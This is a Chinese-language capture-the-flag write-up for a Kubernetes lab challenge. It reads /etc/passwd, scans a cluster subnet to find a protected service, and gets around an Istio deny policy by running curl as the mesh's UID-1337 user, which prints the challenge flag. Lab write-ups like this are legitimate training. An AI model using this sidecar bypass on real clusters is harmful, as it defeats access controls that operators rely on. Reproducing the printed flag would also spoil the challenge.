Bypassing Boundaries

备注

The Beauty and The Ist

Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution.

显然，新的服务网格技术对超高级用户（root 用户）具有独特的吸引力。不要滥用这种能力；请负责任且谨慎地使用它。

既然题目说了，对超高级用户有吸引力，那么先查看用户状态

/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
_rpc:x:102:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:103:65534::/var/lib/nfs:/usr/sbin/nologin
istio:x:1337:1337::/home/istio:/bin/sh
player:x:1001:1001::/home/player:/bin/sh

同时，题目给了一份策略

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: istio-get-flag
  namespace: k8s-lan-party
spec:
  action: DENY
  selector:
    matchLabels:
      app: "{flag-pod-name}"
  rules:
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    to:
    - operation:
        methods: ["POST", "GET"]

可以看到，被限制了通过 GET 和 POST 来访问服务

先探测一下服务地址

root@wiz-k8s-lan-party:~# dnscan -subnet 10.100.0.0/16
/ 65536 [---------------------------------------------------------------------------------------------------------------------------------------->___________________] 87.64% 946 p/s
100.224.159 istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
/ 65536 [----------------------------------------------------------------------------------------------------------------------------------------------------------->] 99.79% 949 p/s
100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
/ 65536 [-----------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% 953 p/s

尝试进行访问

root@wiz-k8s-lan-party:~# curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
RBAC: access denied

针对 istio 设立的限制，可以使用 UID 为 1337 的用户来绕过限制，即可以使用 istio 这个用户来发起请求

root@wiz-k8s-lan-party:~# su - istio -c 'curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local'
su: warning: cannot change directory to /home/istio: No such file or directory
wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}

即可得到答案

wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}